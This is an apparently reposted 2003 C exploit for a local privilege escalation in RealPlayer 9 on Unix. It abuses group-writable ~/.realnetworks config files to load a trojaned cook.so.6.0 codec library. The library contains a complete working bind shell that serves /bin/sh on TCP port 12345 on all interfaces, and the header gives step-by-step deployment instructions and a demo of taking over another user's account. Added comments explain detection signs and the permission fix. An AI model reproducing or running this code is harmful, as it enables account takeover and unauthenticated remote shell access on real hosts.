FlyFar

RealPlayer 9 *nix - Local Privilege Escalation

Mar 13th, 2024
  1. /**
  2.  * rp9-priv-esc.c
  3.  *
  4.  * A local privilege escalation attack against the community supported
  5.  * version of Real.com's Realplayer, version 9.
  6.  *
  7.  * Written by:
  8.  *  
  9.  *  Jon Hart warchild spoofed.org
  10.  *
  11.  * By default, configuration files are stored in ~$USER/.realnetworks/,
  12.  * but all the files in there are group writeable.  So long as ~$USER
  13.  * has group execution permissions (which is pretty common), a malicious
  14.  * local user can edit the config files of fellow users to do his biddings.  
  15.  *
  16.  * There are a number of ways to attack this, but after some poking it seems
  17.  * that modifying the path to shared libraries and writing my own malicious
  18.  * shared libraries was the easiest.  
  19.  *
  20.  * (as an aside, just because the shared libraries in the directories contained
  21.  * in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get
  22.  * the symbols back.  objdump quickly can tell us what the names of the 15
  23.  * functions are, and we can stub out a bogus shared library pretty quickly.)
  24.  *
  25.  * This particular bit of code is meant to replace the shared library
  26.  * cook.so.6.0, which is contained in the Codecs directory.  To execute this
  27.  * attack against a fellow local user, first edit their config file
  28.  * (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable
  29.  * point to a directory under your control, like /tmp/Codecs.  Copy all of the
  30.  * existing files from the previous value of dt_codecs (which is usually something
  31.  * like ~victim/Real/Codecs/) to /tmp/Codecs.  Next, compile the code below as a
  32.  * shared library and copy it to the trojaned directory:
  33.  *
  34.  *
  35.  * `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`
  36.  *
  37.  *  The next time the victim fires up realplayer 9, a nice little shell
  38.  * will be listening on port 12345 for you:
  39.  *
  40.  * guest@haiti:/$ id
  41.  * uid=1006(guest) gid=100(users) groups=100(users)
  42.  * guest@haiti:/$ nc localhost 12345
  43.  * id
  44.  * uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)
  45.  *
  46.  * Of course, you don't have to execute a shell.  Do whatever makes you happy.
  47.  *
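  48.  * Fix?  `chmod 700 ~/.realnetworks/*`
       *       (This only changes entries that already exist and leaves the
       *       directory's own mode alone.  `chmod -R go-rwx ~/.realnetworks`
       *       covers both; files the player creates later still need checking.)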
  49.  *
  50.  *  Copyright (c) 2003, Jon Hart
  51.  * All rights reserved.
  52.  *
  53.  *  Redistribution and use in source and binary forms, with or without modification,
  54.  *  are permitted provided that the following conditions are met:
  55.  *
  56.  *  * Redistributions of source code must retain the above copyright notice,
  57.  *    this list of conditions and the following disclaimer.
  58.  *  * Redistributions in binary form must reproduce the above copyright notice,
  59.  *    this list of conditions and the following disclaimer in the documentation
  60.  *    and/or other materials provided with the distribution.
  61.  *  * Neither the name of the organization nor the names of its contributors may
  62.  *    be used to endorse or promote products derived from this software without
  63.  *    specific prior written permission.
  64.  *
  65.  *
  66.  *  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  67.  *  AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  68.  *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  69.  *  ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
  70.  *  LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  71.  *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  72.  *  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  73.  *  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  74.  *  OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
  75.  *  USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  76.  *
  77.  *
  78.  *
  79.  *
  80.  */
  81. #define PORT 12345
  82. #include <stdio.h>
  83. #include <signal.h>
  84. #include <sys/types.h>
  85. #include <sys/socket.h>
  86. #include <netinet/in.h>
  87. #include <stdlib.h>
  88.  
  89. void RAInitEncoder(void) { }
  90. /** This just happens to be one of the first
  91.  * functions that realplayer calls after cook.so.6.0 is loaded
       *
       * Every other export in this block is an empty stand-in; per the header
       * comment the names were read out of the original cook.so.6.0 so that
       * the player's symbol lookups succeed.  All of them are declared
       * void(void), so whatever arguments the player passes are ignored and
       * no audio is decoded.
       *
       * For a defender the point is that the player runs code from whatever
       * file sits in the directory its config names, with no check visible
       * on this page that the file is the shipped codec.  Comparing the codec
       * files against the packaged originals, and checking that dt_codecs
       * still points at the install path, exposes a swap like this one.
  92.  */
  93. void RAOpenCodec2(void) { cookthis(); }
  94. void RAOpenCodec(void) {  }
  95. void RAGetNumberOfFlavors(void) {  }
  96. void RACloseCodec(void) {  }
  97. void RADecode(void) {  }
  98. void RAEncode(void) {  }
  99. void RAFreeEncoder(void) {  }
  100. void RAGetNumberOfFlavors2(void) {  }
  101. void RAFreeDecoder(void) {  }
  102. void RAFlush(void) {  }
  103. void RAGetFlavorProperty(void) {  }
  104. void G2(void) { }
  105. void RASetFlavor(void) {  }
  106. void RAInitDecoder(void) {  }
  107. void RACreateEncoderInstance(void) { }
  108.  
  109. /* Bind /bin/sh to PORT.  It forks
  110.  * and all that good stuff, so it won't
  111.  * easily go away.
        *
        * Behaviour as written, for anyone triaging this file:
        *  - A TCP listener is opened on PORT (12345) and bound to INADDR_ANY,
        *    so it is exposed on every interface of the host, not only to
        *    local users, and nothing authenticates the peer.
        *  - The exit() calls end the process that loaded this library.  The
        *    first fork() is followed by exit() in the parent, so the player
        *    that was just launched goes away while a child carries on.
        *  - setpgrp(), ignoring SIGHUP and the second fork() put the survivor
        *    in its own process group and keep it alive across a hangup.
        *  - After each accept(), fork() returns non-zero in the accepting
        *    process; that process puts the socket on fds 0-2 and replaces
        *    itself with /bin/sh.  The new child closes the client socket and
        *    returns to accept().
        *
        * What this leaves on a host: a user-owned listener on TCP 12345, and
        * processes named "realplay" whose executable is /bin/sh and whose
        * stdin/stdout/stderr are a socket.  Either of these, or a player that
        * exits right after start, is a reason to inspect the dt_codecs path
        * in that user's config and the mode of ~/.realnetworks.
  112.  */
  113. int cookthis() {
  114.  
  115.  
  116.         int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
  117.         struct sockaddr_in server_addr;
  118.         struct sockaddr_in client_addr;
  119.  
  120.         if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
  121.                 exit(EXIT_FAILURE);
  122.  
  123.         bzero((char *) &server_addr, sizeof(server_addr));
  124.         server_addr.sin_family = AF_INET;
  125.         server_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* every interface, not only loopback */
  126.         server_addr.sin_port = htons(PORT);
  127.  
  128.         if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0)
  129.                 exit(EXIT_FAILURE);
  130.         if (fork() != 0) /* parent (the player process) exits here; so does a failed fork() */
  131.                 exit(EXIT_SUCCESS);
  132.         setpgrp();  
  133.         signal(SIGHUP, SIG_IGN);
  134.         if (fork() != 0)
  135.                 exit(EXIT_SUCCESS);
  136.         if ((sock_recv = listen(sock_des, 5)) != 0)
  137.                 exit(EXIT_SUCCESS);
  138.         while (1) {
  139.                 sock_len = sizeof(client_addr);
  140.                 if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
  141.                         exit(EXIT_SUCCESS);
  142.                 client_pid = getpid(); /* assigned but never read */
  143.                 server_pid = fork();
  144.                 if (server_pid != 0) { /* true in the parent, and when fork() returned -1 */
  145.                         dup2(sock_client,0);
  146.                         dup2(sock_client,1);
  147.                         dup2(sock_client,2);
  148.  
  149.                         execl("/bin/sh","realplay",(char *)0); /* argv[0] is "realplay"; the image is /bin/sh */
  150.                         close(sock_client); /* reached only if execl() failed */
  151.                         exit(EXIT_SUCCESS);
  152.                 }
  153.                 close(sock_client);
  154.         }
  155. }
  156.  
  157.  
  158.  
  159.  
  160. // milw0rm.com [2003-09-09]
  161.            